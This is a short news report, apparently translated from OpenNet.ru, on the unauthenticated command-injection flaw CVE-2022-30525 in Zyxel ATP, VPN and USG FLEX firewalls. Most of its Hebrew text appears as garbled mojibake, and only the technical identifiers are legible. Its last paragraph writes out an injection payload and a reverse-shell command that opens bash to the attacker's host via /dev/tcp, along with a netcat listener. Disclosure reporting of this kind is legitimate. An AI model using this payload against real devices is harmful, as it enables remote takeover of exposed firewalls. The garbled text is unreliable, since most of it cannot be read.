ืคื’ื™ืขื•ืช ื‘ื—ื•ืžื•ืช ืืฉ ืฉืœ Zyxel ื”ืžืืคืฉืจืช ื‘ื™ืฆื•ืข ืงื•ื“ ืœืœื ืื™ืžื•ืช

ื–ื•ื”ืชื” ืคื’ื™ืขื•ืช ืงืจื™ื˜ื™ืช (CVE-2022-30525) ื‘ืžื›ืฉื™ืจื™ Zyxel ืžืกื“ืจืช ATP, VPN ื•-USG FLEX, ืฉื ื•ืขื“ื” ืœืืจื’ืŸ ืืช ืคืขื•ืœืช ื—ื•ืžื•ืช ื”ืืฉ, IDS ื•-VPN ื‘ืืจื’ื•ื ื™ื, ืžื” ืฉืžืืคืฉืจ ืœืชื•ืงืฃ ื—ื™ืฆื•ื ื™ ืœื‘ืฆืข ืงื•ื“ ืขืœ ืžื›ืฉื™ืจ ืœืœื ื–ื›ื•ื™ื•ืช ืžืฉืชืžืฉ ืœืœื ืื™ืžื•ืช. ื›ื“ื™ ืœื‘ืฆืข ืชืงื™ืคื”, ืชื•ืงืฃ ื—ื™ื™ื‘ ืœื”ื™ื•ืช ืžืกื•ื’ืœ ืœืฉืœื•ื— ื‘ืงืฉื•ืช ืœืžื›ืฉื™ืจ ื‘ืืžืฆืขื•ืช ืคืจื•ื˜ื•ืงื•ืœ HTTP/HTTPS. Zyxel ืชื™ืงื ื” ืืช ื”ืคื’ื™ืขื•ืช ื‘ืขื“ื›ื•ืŸ ื”ืงื•ืฉื—ื” ืฉืœ ZLD 5.30. ืœืคื™ ืฉื™ืจื•ืช Shodan, ื™ืฉื ื ื›ื™ื•ื 16213 ืžื›ืฉื™ืจื™ื ืฉืขืœื•ืœื™ื ืœื”ื™ื•ืช ืคื’ื™ืขื™ื ื‘ืจืฉืช ื”ื’ืœื•ื‘ืœื™ืช ืฉืžืงื‘ืœื™ื ื‘ืงืฉื•ืช ื‘ืืžืฆืขื•ืช HTTP/HTTPS.

ื”ืคืขื•ืœื” ืžืชื‘ืฆืขืช ืขืœ ื™ื“ื™ ืฉืœื™ื—ืช ืคืงื•ื“ื•ืช ืฉืชื•ื›ื ื ื• ื‘ืžื™ื•ื—ื“ ืœืžื˜ืคืœ ื”ืื™ื ื˜ืจื ื˜ /ztp/cgi-bin/handler, ื ื’ื™ืฉื•ืช ืœืœื ืื™ืžื•ืช. ื”ื‘ืขื™ื” ื ื’ืจืžืช ืžื”ื™ืขื“ืจ ื ื™ืงื•ื™ ื ื›ื•ืŸ ืฉืœ ืคืจืžื˜ืจื™ ื‘ืงืฉื” ื‘ืขืช ื‘ื™ืฆื•ืข ืคืงื•ื“ื•ืช ื‘ืžืขืจื›ืช ื‘ืืžืฆืขื•ืช ื”ืงืจื™ืื” os.system ื”ืžืฉืžืฉืช ื‘ืกืคืจื™ื™ืช lib_wan_settings.py ื•ืžื‘ื•ืฆืขืช ื‘ืขืช ืขื™ื‘ื•ื“ ืคืขื•ืœืช setWanPortSt.

ืœื“ื•ื’ืžื”, ืชื•ืงืฃ ื™ื›ื•ืœ ืœื”ืขื‘ื™ืจ ืืช ื”ืžื—ืจื•ื–ืช "; ping 192.168.1.210;" ืžื” ืฉื™ื•ื‘ื™ืœ ืœื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื” "ping 192.168.1.210" ื‘ืžืขืจื›ืช. ื›ื“ื™ ืœืงื‘ืœ ื’ื™ืฉื” ืœืžืขื˜ืคืช ื”ืคืงื•ื“ื”, ืืชื” ื™ื›ื•ืœ ืœื”ืคืขื™ืœ ืืช "nc -lvnp 1270" ื‘ืžืขืจื›ืช ืฉืœืš, ื•ืœืื—ืจ ืžื›ืŸ ืœื™ื–ื•ื ื—ื™ื‘ื•ืจ ื”ืคื•ืš ืขืœ ื™ื“ื™ ืฉืœื™ื—ืช ื‘ืงืฉื” ืœืžื›ืฉื™ืจ ืขื ื”-'; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;'.

ืžืงื•ืจ: OpenNet.ru

ื”ื•ืกืคืช ืชื’ื•ื‘ื”